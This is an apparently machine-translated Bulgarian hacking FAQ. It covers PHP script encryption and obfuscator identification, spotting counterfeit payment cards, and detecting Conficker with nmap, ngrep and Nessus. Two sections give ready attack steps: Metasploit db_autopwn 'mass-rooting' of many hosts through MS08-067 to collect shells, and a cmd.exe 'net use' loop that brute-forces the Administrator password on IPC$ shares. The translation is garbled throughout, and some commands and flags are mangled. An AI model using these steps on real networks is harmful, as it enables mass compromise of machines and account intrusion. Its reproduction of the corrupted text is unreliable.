Easy-хак - Моите статии - Издател - zonahaka-всичко за хакване, хакване, xaker

Цел: Да се ​​шифроват PHP-скрипт код
решение

Имам изброени няколко популярни проекти. В действителност, тези продукти са много повече, а в тяхното търсене ще помогне за www.google.com :).






А сега да разгледаме процедурата да скрие съдържанието на PHP-скрипт с помощта www.zorex.info онлайн услуга:

1. Вземете кода на скрипта, че трябва да скочи с. Например:

2. Отворете сайта, www.zorex.info онлайн услуга.
3. Изберете в «Zorex PHP CryptZ» сервизното меню и кликнете върху линка.
4. Попълнете следните полета:
Източник на файла // нашия Скриптът
Decoder Име // име на файла декодер
Изходна Zip // архив с резултата (сценария + декодер)
Limit ще бъде домакин // ограничение на приемащата
Ограничаване на IP // ограничение от IP

5. Hit питка и да получите линк към архива с криптирана скрипт.
6. Разопаковайте архива, виждаме, от вътрешната страна на двата файла:
nash_skript.php;
dekoder_dlya_nashego_skripta.php.

7. Отворете nash_skript.php и проверете kriptovat код:

скрипт кодират с помощта на

Както можете да видите, всички прилични.

8. И накрая - тест декодер.

Аз за пример само един от многото онлайн услуги за кода за криптиране в PHP-скрипт. Вашият избор зависи от личните предпочитания и изискванията за алгоритъм.
Цел: Да се ​​определи Obfuscator, която е криптирана с PHP-скрипт
решение

Наскоро е имало голям брой различни протектора obfuscators и PHP код. още по-трудно да се разбере, отколкото се кодира от един скрипт Всеки път: често се възстанови sorets - по-лесно, отколкото да се определи Obfuscator тип. Ето защо, ние ще използваме специална програма, наречена PCL е PHPiD, напълно подходящ за нашите цели. Програмата има за цел да определи и протектори obfuscators PHP код и може да разпознае 20 различни алгоритми, включително:
определени протектори
TrueBug PHP Encoder 1.0.2 (вкл. GZIP), 1.0.3 / 1.0.4
NuSphere NuCoder
Zend Encoder / Zend SafeGuard Suite
ByteRun протектор за PHP
SourceCop (вкл. Модул за защита)
CodeLock (вкл. Модул за защита)
SourceGuardian за PHP
PHPCipher
phpSHIELD
CNCrypto
PHTML Encoder
ionCube PHP Encoder
PHP Lockit! 1.8, 2.0 (вкл. GZIP)
Obfusc (Basic / Normal, ShowObfuscate)
Zorex PHP CryptZ (вкл. Защита модул)
gencoder
DWebEncoder
Безплатна PHP Encoder
PHP Compact
TrueBug PHP Obfuscator 1.1
PHPCoder / eAccelerator
определени obfuscators
Семантичните дизайни Obfuscator
PHP Defender
PHP Lockit! (Режим объркване)
Raizlabs PHP Obfuscator
POBS - PHP Obfuscator

Да разгледаме подробно последователност от действия за решаване на проблема:
Обединяване PHPiD комунални услуги PCL си от нашия DVD.
Изпълнете ehe'shnik phpid.exe.
Изборът бъркани от скрипт, например:

4. В tulzy видите резултата: Безплатен PHP Encoder - www.freephpencoder.com. В съответствие с това задачата е завършена: Защитник успешно дефинирана и sorets издигне самия скрипт ми :).

Послепис Не забравяйте, че размерът на анализираните скрипт комунални услуги, не трябва да надвишава 1 метър, или функционалността не е гарантирано.
Цел: Да се ​​разграничат Visa / MasterCard фалшиви карти от оригинала
решение

Платежните терминали и банкомати вече не са на стойност, освен в боксовете на царевица. Аз ще ви кажа как да се разграничи от лявата първоначалната карта. За да направите това, съставихме един малък списък от характерни черти. Ръководейки тях, можете да се идентифицират фалшив лесно:
Научете микропринтиране около VISA лого. Ако е почти нечетлив и изтрити от картата - бъдете сигурни, преди да левичар!
Следващата важна подробност - холограмата. оригинален холограмен фон е чист, огледало, и детайлите на изображението са лесно различими. Главната особеност на фалшиви холограми - липсата на силата на звука. В допълнение, "ляво" холограмата лесно отлепя (обикновено една проста стикер). Реал холограма е невъзможно да се събори един пирон или откъсне кредитна карта по друг начин.
Погледнете в лентата за подпис на обратната страна на картата. На оригиналната лента в повечето случаи не е на фона на надпис «MasterCard» или «Visa» (в зависимост от типа на картата). В допълнение, лентата трябва да бъде поставен на номера на картата и кода за сигурност.






Понякога се преструва използва ламинат покрит от двете страни - това прозрачно фолио е лесно да се отлепи по краищата, особено ако тя е от малко помощ.
Първите четири цифри от номера на картата (BIN), дублирани контрастен цвят може да се изтрие с фалшива карта. BIN на оригинала не може да бъде изтрита!
Струва си да се обръща внимание на символа «V» и "MS" (на съответните видове карти) на. Те могат да се различават от стандартната дебелина / ширина.
В ултравиолетова светлина специални изображения могат да отсъстват от фалшиви карти (например, летящ гълъб на VISA карти). Най-вероятно изображението е размазано или воля, или че няма да е най-малко.
Данните нанесени на картата трябва да съвпадат с данните, депозирани на магнитната лента!

Вие със сигурност не просто изправени пред проблема да има символи на кирилица в пътя до профила на сметката (не забравяйте криво работа Metasploit рамка с "администратор" сметка). Обикновено преименувате при вас не проработи - трябваше да копирате необходимите библиотеки и да ги регистрират начин.

И накрая - една забележка. Uchetki копира профила, при които седите, не можете. Вие трябва да отидете на всеки друг от група "Администратори" на и копие от там.
Цел: Наскоро, известният троянски Conficker (ru.wikipedia.org/wiki/Conficker) е заразил един куп автомобили, и всички те bazhnye. Как да ги идентифицира?
решение

1. подход чрез Nmap. Идентифицирайте червеят може да се сканира в същата подмрежа. Полезни обичай сценарий, написан в Nmap SE - той вече е описано в предишните въпроси. Това се прави със следната команда:

Nmap -PN -T4 -p139,445 -н-V --script = SMB-чек-vulns --script-аргументи безопасни = 1 192.168.111.0/24,

където
скрипт - Като се обозначава дали да подаде жалба до сценария, който вече е в най-новата версия на Nmap (Nmap 4.85BETA7).
PN - деактивира разпознаването на имената на домейни (СНП).
п - забранява проверката за "жизнеността" на домакина.

Деактивирането на по-горните варианти значително увеличава скоростта на сканиране. За големи мрежи, използвайте командата:

Nmap -SC -PN -d -p445 -п -T4 --min-hostgroup 256 --min-паралелизъм 64 --script = SMB-Check-vulns --script-опцията = безопасно = 1 10.0.0.0/8

Поради естеството на скенер уязвимост се препоръчва да се играе на разстояние от 139 и 445 TCP портове. Сканирането води, които ще намерите записи «Conficker: Вероятно CLEAN» или «Conficker: Вероятно ЗАРАЗЕНО».

2. подход, използвайки nGREP. Ngrep функционалност е много богат, например, ви позволява да стартирате обема на трафика, търсенето от полезния товар (тоест, информацията, която се съхранява в пакетите на мрежата, тъй като данните). Подписът на Conficker може да се намери в почти всички модерни архиви и блогове за информационна сигурност - можете спокойно да го използвате:

ngrep -qd eth0-W единична -s 900 -X

0b0b4feebeb "TCP порт 445

и DST нетния 127.0.208.0/24 "

Първо, трябва promonitorit мрежовата активност и записва всяка част от обучени на трафик, а след това се хранят сметището ngrep'u.

3. Подход чрез Nessus. Популярни скенер също няма да е излишно. Има специална приставка (nessus.org/plugins/index.php?view=singleid=36036), която ви позволява да се отървете от всички хостове и за идентифициране на жертвата. Наред с другите неща, я нарича "жертва" не може да бъде, защото тя се оценява CVSSv2 показатели, на Conficker има "критично" ниво на увреждане (Critical / CVSS Base рейтинг. 10.0). За идентифициране на необходимостта да изпълните следните стъпки:

Nessus извличане е правилно конфигуриран да получите професионална емисия

б) Търсим приставка на номер 36036 и прилага.

4. Подходът използване програма Computer технологичен институт Бон.

а) Изтегли забележителна мрежа полезност, предназначени само за тази цел. Може да се изтегли от тук - iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.

б) Изпълнете командата за $ ./scs2.py на 10.0.0.1 10.0.0.5

[НЕИЗВЕСТНО] 10.0.0.1: Няма отговор от порт 445 / TCP.

[НЕИЗВЕСТНО] 10.0.0.2: не може да тече NetpwPathCanonicalize.

5. Парс резултати.
Проблем: Как да използвате Metasploit да организира massruting?
решение

Нищо неприлично :). Massruting - маса на заразените машини, използваща известно (или неизвестни) уязвимост. Ако по-рано за това действие на организацията ще трябва да пиша Tuyev huchu скриптове, тогава Metasploit всичко става по-лесно. Ние просто трябва да следвате няколко стъпки.

1. подкрепа за Грузия sqlite3 база данни:

MSF> натоварване db_sqlite3 [*] Успешно зареден плъгин: db_sqlite3

2. Инициализиране създаването на нова база данни:

MSF> db_create [*] Посоченият базата данни вече съществува, свързващ [*] Успешно свързан към базата данни [*] Файл: /root/.msf3/sqlite3.db

За да се ускори нашите тестове използват модула вграден NMAP'a от обхвата на мрежата:

MSF> db_nmap -sS -PS445 -p445 -н -Т Агресивни AAA.BBB.CCC.0 / 24

3. Тази последна игра - тичам massruting на уязвимост MS08-067:

MSF> db_autopwn -e -р-Ь -m ms08_067

Послепис За да се събират статистически данни за дейността на получения Shell кара екип MSF> сесии -L.
Цел: Да се ​​организира речника атака на защитен с парола споделени ресурси
решение

1. състави речника атака. Да кажем, че това е един текстов документ от 100 думи, по една на ред. Наречете го passwords.txt.

2. Още от команден ред cmd.exe, въведете следната команда.

ЗА / F "символи = 1 *"% и в (passwords.txt) направи нето употреба # 92; # 92; # 92 192.168.1.1; IPC $% и / ф: Administrator

3. Радвай бърз процес изброяване.

Послепис Методът се прилага единствено за нападението на администраторската парола. Използването на груба сила към други данни за вход веднага ще доведе до блокиране на акаунта.